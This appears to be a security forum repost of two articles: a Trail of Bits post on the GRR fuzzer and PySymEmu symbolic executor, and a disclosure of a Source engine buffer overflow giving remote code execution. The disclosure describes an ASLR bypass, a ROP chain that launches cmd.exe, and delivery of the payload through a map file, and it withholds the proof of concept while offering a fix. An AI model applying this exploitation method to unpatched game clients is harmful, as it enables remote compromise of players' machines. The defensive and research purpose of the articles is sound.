A fuzzer and a symbolic executor walk into a cloud POST AUGUST 2, 2016 29 COMMENTS Finding bugs in programs is hard. Automating the process is even harder. We tackled the harder problem and produced two production-quality bug-finding systems: GRR, a high-throughput fuzzer, and PySymEmu (PSE), a binary symbolic executor with support for concrete inputs. From afar, fuzzing is a dumb, brute-force method that works surprisingly well, and symbolic execution is a sophisticated approach, involving theorem provers that decide whether or not a program is “correct.” Through this lens, GRR is the brawn while PSE is the brains. There isn’t a dichotomy though — these tools are complementary, and we use PSE to seed GRR and vice versa. Let’s dive in and see the challenges we faced when designing and building GRR and PSE. GRR, the fastest fuzzer around GRR is a high speed, full-system emulator that we use to fuzz program binaries. A fuzzing “campaign” involves executing a program thousands or millions of times, each time with a different input. The hope is that spamming a program with an overwhelming number of inputs will result in triggering a bug that crashes the program. Note: GRR is pronounced with two fists held in the air During DARPA’s Cyber Grand Challenge, we went web-scale and performed tens of billions of input mutations and program executions — in only 24 hours! Below are the challenges we faced when making this fuzzer, and how we solved those problems. Throughput. Typically, program fuzzing is split into discrete steps. A sample input is given to an input “mutator” which produces input variants. In turn, each variant is separately tested against the program in the hopes that the program will crash or execute new code. GRR internalizes these steps, and while doing so, completely eliminates disk I/O and program analysis ramp-up times, which represent a significant portion of where time is spent during a fuzzing campaign with other common tools. Transparency. 
Transparency requires that the program being fuzzed cannot observe or interfere with GRR. GRR achieves transparency via perfect isolation. GRR can “host” multiple 32-bit x86 processes in memory within its 64-bit address space. The instructions of each hosted process are dynamically rewritten as they execute, guaranteeing safety while maintaining operational and behavioral transparency. Reproducibility. GRR emulates both the CPU architecture and the operating system, thereby eliminating sources of non-determinism. GRR records program executions, enabling any execution to be faithfully replayed. GRR’s strong determinism and isolation guarantees let us combine the strengths of GRR with the sophistication of PSE. GRR can snapshot a running program, enabling PSE to jump-start symbolic execution from deep within a given program execution. PySymEmu, the PhD of binary symbolic execution Symbolic execution as a subject is hard to penetrate. Symbolic executors “reason about” every path through a program, there’s a theorem prover in there somewhere, and something something… bugs fall out the other end. At a high level, PySymEmu (PSE) is a special kind of CPU emulator: it has a software implementation for almost every hardware instruction. When PSE symbolically executes a binary, what it really does is perform all the ins-and-outs that the hardware would do if the CPU itself was executing the code. PSE explores the relationship between the life and death of programs in an unorthodox scientific experiment CPU instructions operate on registers and memory. Registers are names for super-fast but small data storage units. Typically, registers hold four to eight bytes of data. Memory on the other hand can be huge; for a 32-bit program, up to 4 GiB of memory can be addressed. PSE’s instruction simulators operate on registers and memory too, but they can do more than just store “raw” bytes — they can store expressions. 
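The idea of registers holding expressions rather than raw bytes can be sketched in a few lines of Python (a toy with made-up class names, not PySymEmu's actual API): concrete operands are folded immediately, while any operand involving a free input symbol produces an expression tree instead.

```python
# Toy model (assumed names, not PySymEmu's API): registers normally hold
# concrete integers, but a symbolic emulator lets them hold expression
# trees built from free input symbols.

class Sym:
    """A free input symbol, e.g. one unconstrained input byte."""
    def __init__(self, name):
        self.name = name
    def __repr__(self):
        return self.name

class Add:
    """Expression node produced by emulating an ADD instruction."""
    def __init__(self, a, b):
        self.a, self.b = a, b
    def __repr__(self):
        return f"({self.a} + {self.b})"

regs = {"eax": Sym("input_byte_0"), "ebx": 4}   # symbolic and concrete mix

def emulate_add(regs, dst, src):
    # ADD dst, src: fold constants when possible, else build an expression.
    a, b = regs[dst], regs[src]
    regs[dst] = a + b if isinstance(a, int) and isinstance(b, int) else Add(a, b)

emulate_add(regs, "eax", "ebx")
print(regs["eax"])   # → (input_byte_0 + 4)
```

A real executor hands such expressions to an SMT solver to decide which branches remain feasible; here the expression is only built, never solved.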
A program that consumes some input will generally do the same thing every time it executes. This happens because that “concrete” input will trigger the same conditions in the code, and cause the same loops to merry-go-round. PSE operates on symbolic input bytes: free variables that can initially take on any value. A fully symbolic input can be any input and therefore represents all inputs. As PSE emulates the CPU, if-then-else conditions impose constraints on the originally unconstrained input symbols. An if-then-else condition that asks “is input byte B less than 10” will constrain the symbol for B to be in the range [0, 10) along the true path, and to be in the range [10, 256) along the false path. If-then-elses are like forks in the road when executing a program. At each such fork, PSE will ask its theorem prover: “if I follow the path down one of the prongs of the fork, then are there still inputs that satisfy the additional constraints imposed by that path?” PSE will follow each yay path separately, and ignore the nays. So, what challenges did we face when creating and extending PSE? Comprehensiveness. Arbitrary program binaries can exercise any one of thousands of the instructions available to x86 CPUs. PSE implements simulation functions for hundreds of x86 instructions. PSE falls back onto a custom, single-instruction “micro-executor” in those cases where an instruction emulation is not or cannot be provided. In practice, this setup enables PSE to comprehensively emulate the entire CPU. Scale. Symbolic executors try to follow all feasible paths through a program by forking at every if-then-else condition, and constraining the symbols one way or another along each path. In practice, there are an exponential number of possible paths through a program. PSE handles the scalability problem by selecting the best path to execute for the given execution goal, and by distributing the program state space exploration process across multiple machines. Memory. 
Symbolic execution produces expressions representing simple operations like adding two symbolic numbers together, or constraining the possible values of a symbol down one path of an if-then-else code block. PSE gracefully handles the case where addresses pointing into memory are symbolic. Memory accessed via a symbolic address can potentially point anywhere — even point to “good” and “bad” (i.e. unmapped) memory. Extensibility. PSE is written using the Python programming language, which makes it easy to hack on. However, modifying a symbolic executor can be challenging — it can be hard to know where to make a change, and how to get the right visibility into the data that will make the change a success. PSE includes smart extension points that we’ve successfully used for supporting concolic execution and exploit generation. Measuring excellence So how do GRR and PSE compare to the best publicly available tools? GRR GRR is both a dynamic binary translator and fuzzer, and so it’s apt to compare it to AFLPIN, a hybrid of the AFL fuzzer and Intel’s PIN dynamic binary translator. During the Cyber Grand Challenge, DARPA helpfully provided a tutorial on how to use PIN with DECREE binaries. At the time, we benchmarked PIN and found that, before we even started optimizing GRR, it was already twice as fast as PIN! The more important comparison metric is in terms of bug-finding. AFL’s mutation engine is smart and effective, especially in terms of how it chooses the next input to mutate. GRR internalizes Radamsa, another too-smart mutation engine, as one of its many input mutators. Eventually we may also integrate AFL’s mutators. During the qualifying event, GRR went face-to-face with AFL, which was integrated into the Driller bug-finding system. Our combination of GRR+PSE found more bugs. Beyond this one data point, a head-to-head comparison would be challenging and time-consuming. 
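The brute-force core that these mutation engines refine can be sketched minimally (illustrative only: GRR's mutators and Radamsa are far smarter than exhaustive single-byte flips, and the "target" here is a stand-in function, not a real program):

```python
def target(data):
    # Stand-in "program under test" (assumed): crashes on a magic prefix.
    if data[:2] == b"\xde\xad":
        raise RuntimeError("segfault")

def single_byte_mutants(seed):
    # Every input reachable by changing exactly one byte of the seed.
    for i in range(len(seed)):
        for v in range(256):
            m = bytearray(seed)
            m[i] = v
            yield bytes(m)

crashes = 0
for mutant in single_byte_mutants(b"\xde\x00\x00\x00"):
    try:
        target(mutant)
    except RuntimeError:
        crashes += 1
print(crashes)  # → 1: only seed[1] -> 0xad reaches the crashing prefix
```

The whole game of a fuzzing campaign is running this loop billions of times with smarter mutation and crash triage.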
PySymEmu PSE can be most readily compared with KLEE, a symbolic executor of LLVM bitcode, or the angr binary analysis platform. LLVM bitcode is a far cry from x86 instructions, so it’s an apples-to-oranges comparison. Luckily we have McSema, our open-source and actively maintained x86-to-LLVM bitcode translator. Our experiences with KLEE have been mostly negative; it’s hard to use, hard to hack on, and it only works well on bitcode produced by the Clang compiler. Angr uses a customized version of the Valgrind VEX intermediate representation. Using VEX enables angr to work on many different platforms and architectures. Many of the angr examples involve reverse engineering CTF challenges instead of exploitation challenges. These RE problems often require manual intervention or state knowledge to proceed. PSE is designed to try to crash the program at every possible emulated instruction. For example PSE will use its knowledge of symbolic memory to access any possible invalid array-like memory accesses instead of just trying to solve for reaching unconstrained paths. During the qualifying event, angr went face-to-face with GRR+PSE and we found more bugs. Since then, we have improved PSE to support user interaction, concrete and concolic execution, and taint tracking. I’ll be back! Automating the discovery of bugs in real programs is hard. We tackled this challenge by developing two production-quality bug-finding tools: GRR and PySymEmu. GRR and PySymEmu have been a topic of discussion in recent presentations about our CRS, and we suspect that these tools may be seen again in the near future. By Peter Goodman Sursa: https://blog.trailofbits.com/2016/08/02/engineering-solutions-to-hard-program-analysis-problems/
-
Remote Code Execution In Source Games Valve's Source SDK contained a buffer overflow vulnerability which allowed remote code execution on clients and servers. The vulnerability was exploited by fragging a player, which caused a specially crafted ragdoll model to be loaded. Multiple Source games were updated during the month of June 2017 to fix the vulnerability. Titles included CS:GO, TF2, HL2:DM, Portal 2, and L4D2. We thank Valve for being very responsive and taking care of vulnerabilities swiftly. Valve patched and released updates for their more popular titles within a day. Missing Bounds Check The function nexttoken is used to tokenize a string. Note how the buffer str is copied into the buffer token as long as a NULL character or the delimiter character sep is not found. No bounds checking is performed. View source on GitHub. const char *nexttoken(char *token, const char *str, char sep) { ... while ((*str != sep) && (*str != '\0')) { *token++ = *str++; } ... } The Vulnerability The method ParseKeyValue of class CRagdollCollisionRulesParse is called when processing ragdoll model data, such as when a player is fragged. This method calls nexttoken to tokenize the rule for further processing. By supplying a collisionpair rule longer than 256 characters, the buffer szToken can be overflowed. Since szToken is stored on the stack, the return address of the ParseKeyValue method can be overwritten. View source on GitHub. class CRagdollCollisionRulesParse : public IVPhysicsKeyHandler { virtual void ParseKeyValue( void *pData, const char *pKey, const char *pValue ) { ... else if ( !strcmpi( pKey, "collisionpair" ) ) ... char szToken[256]; const char *pStr = nexttoken(szToken, pValue, ','); ... } } Mitigation Bypass Address Space Layout Randomization (ASLR) is a powerful mitigation against exploiting memory corruption vulnerabilities. The mitigation randomizes the addresses where executables are loaded into memory. 
This feature is opt-in, and all executables loaded into memory of a process must have it enabled in order for it to be effective. The DLL steamclient.dll did not have ASLR enabled. This meant the executable pages of steamclient.dll were loaded into memory at predictable addresses. This allowed existing instructions within the executable memory pages to be located and used trivially. Collecting ROP Gadgets Return Oriented Programming is a technique that allows shellcode to be created by re-using existing instructions in a program. Simply put, you find a chain of instructions that end with a RETN instruction. You insert the address of the first instruction of the chain onto the stack, so when a function returns, the address is popped into the Instruction Pointer register, and then the instructions execute. Since x86 and x64 instructions do not need to be memory aligned, any address can be interpreted as an instruction. By setting the instruction pointer to the middle of an instruction, a wider range of instructions becomes available. The Immunity Debugger plugin Mona provides a utility to discover gadgets. Be aware though, the plugin doesn't find all useful gadgets, such as REP MOVS. Launching cmd.exe Due to the way the payload is processed, NULL characters cannot be used, and upper case characters are converted to lower case characters. This means our choice of ROP gadget addresses becomes limited, as does any other data used in our payload. To get around this, the shellcode is bootstrapped with a gadget chain which locates the original un-modified buffer in memory. The un-modified payload is then copied back onto the stack via a REP MOVS gadget. The steamclient.dll executable imports LoadLibraryA and GetProcAddressA. This allows us to load other DLLs into memory, and obtain references to additional exported functions. We can import Shell32.dll to obtain a reference to the function ShellExecuteA, which can be used to launch other programs. 
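The gadget-hunting step can be sketched as a scan for byte sequences ending in a RET (0xc3) opcode. This toy scanner is illustrative only (tools like Mona decode instructions properly and do far more); the code blob below is made up, standing in for a non-ASLR module:

```python
# Toy ROP gadget scan (illustrative; real tools decode instructions).
# 0x5d = pop ebp, 0xc3 = ret, 0x90 = nop, 0x58 = pop eax, 0x5b = pop ebx.
code = bytes.fromhex("5dc390585bc3cc")  # made-up code bytes

gadgets = []
for i, b in enumerate(code):
    if b == 0xC3:                      # found a RET
        start = max(0, i - 2)          # keep up to two preceding bytes
        gadgets.append((start, code[start:i + 1].hex()))

print(gadgets)   # → [(0, '5dc3'), (3, '585bc3')]
```

Because x86 instructions are unaligned, a real scanner would also re-decode from every offset before each RET, yielding "hidden" gadgets this sketch misses.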
Proof Of Concept In order to give third-party mod creators time to update their games, the proof of concept will be released in 30 days. Source mod developers should apply the patch below. Delivering The Payload The Source engine allows custom content to be packed into map files. Commonly this is used for adding extra content to maps, such as sounds or textures. By packing a ragdoll model file into a map file with the same resource path as an original ragdoll model file, our version will be used instead. Recommended Fix To prevent buffer overflows from occurring, do not store more data in a buffer than it can hold. The nexttoken function should accept a token length argument which would be used to perform bounds checking. Developers who have created a Source modification game should apply the following patch. To mitigate exploitation of memory corruption vulnerabilities, enable ASLR for all executables. Perform automated checks during the build process to ensure all executables support ASLR. This can be achieved by using the checkbins.py utility developed by the Chromium team. Additionally, Source games should be sandboxed to restrict access to resources and to prevent new processes from being started. As an example of how effective proper sandboxing can be, kernel exploits are often used when exploiting web browser memory corruption vulnerabilities, since the userland browser process is so restricted. For additional information, refer to Chromium's sandbox implementation. Download Patch Final Thoughts Video games are interesting targets for exploitation, not only technically but also logistically. As video games are common inside employee break rooms and homes of employees, exploitation of a vulnerability could be used in a targeted attack to jump the air gap to a private network. Additionally, discovering a remote code execution vulnerability in a popular video game can be used to quickly create a botnet or spread ransomware. 
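The bounds-checked tokenizer that the Recommended Fix section calls for can be sketched as follows (modeled in Python for brevity; the real patch is C, and the function name here is illustrative, not the actual patched code):

```python
# Sketch of a bounded nexttoken: copying stops before the token buffer's
# capacity is exhausted, so an over-long collisionpair rule is truncated
# instead of overflowing the stack.

def nexttoken_bounded(src, sep, capacity=256):
    token = []
    for ch in src:
        if ch == sep or ch == "\0":
            break
        if len(token) == capacity - 1:   # leave room for the NUL terminator
            break                        # truncate rather than overflow
        token.append(ch)
    return "".join(token)

print(nexttoken_bounded("a,b", ","))                      # → a
print(len(nexttoken_bounded("x" * 300 + ",rest", ",")))   # → 255
```

The C equivalent would take the destination buffer's size as an extra argument and enforce the same cut-off before each write.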
As a mitigation, games should not be installed on work devices. Gaming machines should be moved to an untrusted network, and business devices should not connect to the untrusted network. For those who play Source games, the attack surface can be shrunk by disabling third-party content from downloading. This can be achieved with the console commands cl_allowdownload 0 and cl_downloadfilter all. Additionally, since the vulnerability was discovered in the Source SDK, additional third-party mods are most likely vulnerable. However, by enabling ASLR for all executable modules, a memory disclosure vulnerability is required to develop a reliable exploit. About the author: Justin Taft is a software engineer who is adamant about secure coding practices. He has worked with many Fortune 500 companies to improve the security posture of their products. From reversing firmware of biometric fingerprint readers to performing security reviews of cloud-based Java application deployments, he is experienced in tackling a wide range of security assessments. Sursa: https://oneupsecurity.com/research/remote-code-execution-in-source-games?t=r
-
-